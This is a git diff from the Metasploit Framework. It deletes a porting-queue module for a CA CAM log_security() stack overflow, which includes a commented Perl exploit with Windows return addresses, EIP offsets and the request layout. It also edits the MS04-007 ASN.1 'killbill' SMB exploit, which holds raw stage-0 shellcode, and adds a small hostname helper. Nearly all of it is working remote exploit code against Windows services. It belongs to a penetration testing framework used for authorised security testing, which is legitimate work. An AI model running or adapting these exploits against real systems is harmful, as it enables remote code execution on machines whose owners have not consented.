diff --git a/dev/porting/queue/cacam_logsecurity_win32.rb b/dev/porting/queue/cacam_logsecurity_win32.rb deleted file mode 100644 index b61b1197a9..0000000000 --- a/dev/porting/queue/cacam_logsecurity_win32.rb +++ /dev/null @@ -1,179 +0,0 @@ -require 'msf/core' - -module Msf - -class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote - - include Exploit::Remote::Tcp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'CA CAM log_security() Stack Overflow (Win32)', - 'Description' => %q{ - This module exploits a vulnerability in the CA CAM service - by passing a long parameter to the log_security() function. - The CAM service is part of TNG Unicenter. This module has - been tested on Unicenter v3.1. - - }, - 'Author' => [ 'hdm' ], - 'Version' => '$Revision$', - 'References' => - [ - - ], - 'Privileged' => true, - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", - - }, - 'Targets' => - [ - [ - 'Automatic Targetting', - { - 'Platform' => 'win32, winnt, win2000, winxp, win2003', - 'Ret' => 0x0, - }, - ], - ], - 'DisclosureDate' => '', - 'DefaultTarget' => 0)) - end - - def exploit - connect - - handler - disconnect - end - -=begin - -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::cacam_logsecurity_win32; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'CA CAM log_security() Stack Overflow (Win32)', - 'Version' => '$Revision$', - 'Authors' => [ 'H D Moore ' ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'], - 'Priv' => 1, - 'AutoOpts' => { 'EXITFUNC' => 'process' }, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 4105], - }, - - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 - 'Keys' => ['+ws2ord'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a vulnerability in the CA CAM service by passing - a long parameter to the log_security() function. The CAM service is part - of TNG Unicenter. This module has been tested on Unicenter v3.1. -}), - - 'Refs' => - [ - - ], - - 'DefaultTarget' => 0, - 'Targets' => - [ - # W2API.DLL @ 0x01950000 - return to ESI - # $Header$ - ['W2API.DLL TNG 2.3', 0x01951107], - - # return to ESI in ws2help.dll - ['Windows 2000 SP0-SP4 English', 0x750217ae], - ['Windows XP SP0-SP1 English', 0x71aa16e5], - ['Windows XP SP2 English', 0x71aa1b22], - ['Windows 2003 SP0 English', 0x71bf175f], - ], - - 'Keys' => ['cam'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target = $self->Targets->[$target_idx]; - - $self->PrintLine("[*] Attempting to exploit target " . $target->[0]); - - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - - my $pattern = Pex::Text::EnglishText(4096); - - # Offset 1016 for EIP, 1024 = ESP, 1052 = ESI - substr($pattern, 1016, 4, pack('V', $target->[1])); - substr($pattern, 1052, length($shellcode), $shellcode); - - my $req = - "\xfa\xf9\x00\x10" . $pattern . "\x00"; - - my $ack = $s->Recv(4, 5); - if ($ack ne "ACK\x00") { - $self->PrintLine("[*] The CAM service is not responding."); - return; - } - $s->Send($req); - $s->Recv(-1,1); - $self->Handler($s); - $s->Close(); - - return; -} - -1; - -=end - - -end -end diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index 6f72c016d1..fad8df2497 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -197,6 +197,10 @@ module Exploit::Remote::SMB return data end + def smb_hostname + datastore['SMBNAME'] || '*SMBSERVER' + end + attr_accessor :simple end diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index e2685a6840..26d988cd68 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -78,29 +78,30 @@ class Exploits::Windows::Smb::MS04_007_ASN1_KILLBILL < Msf::Exploit::Remote def exploit # The first stage shellcode fixes the PEB pointer and cleans the heap - stage0 = "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+ - "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+ - "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+ - "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+ - "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+ - "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+ - "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+ - "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+ - "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+ - "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+ - "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+ - "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+ - "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+ - "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+ - "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+ - "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+ - "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+ - "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+ - "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+ - "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+ - "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+ - "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+ - "\x08\x00\xeb\xfe" + stage0 = + "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+ + "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+ + "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+ + "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+ + "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+ + "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+ + "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+ + "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+ + "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+ + "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+ + "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+ + "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+ + "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+ + "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+ + "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+ + "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+ + "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+ + "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+ + "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+ + "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+ + "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+ + "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+ + "\x08\x00\xeb\xfe" token = spnego_token(stage0, payload.encoded) @@ -121,7 +122,7 @@ class Exploits::Windows::Smb::MS04_007_ASN1_KILLBILL < Msf::Exploit::Remote client = Rex::Proto::SMB::Client.new(sock) begin - client.session_request(name) if not datastore['SMBDirect'] + client.session_request(smb_hostname()) if not datastore['SMBDirect'] client.negotiate client.session_setup_ntlmv2_blob(token) rescue => e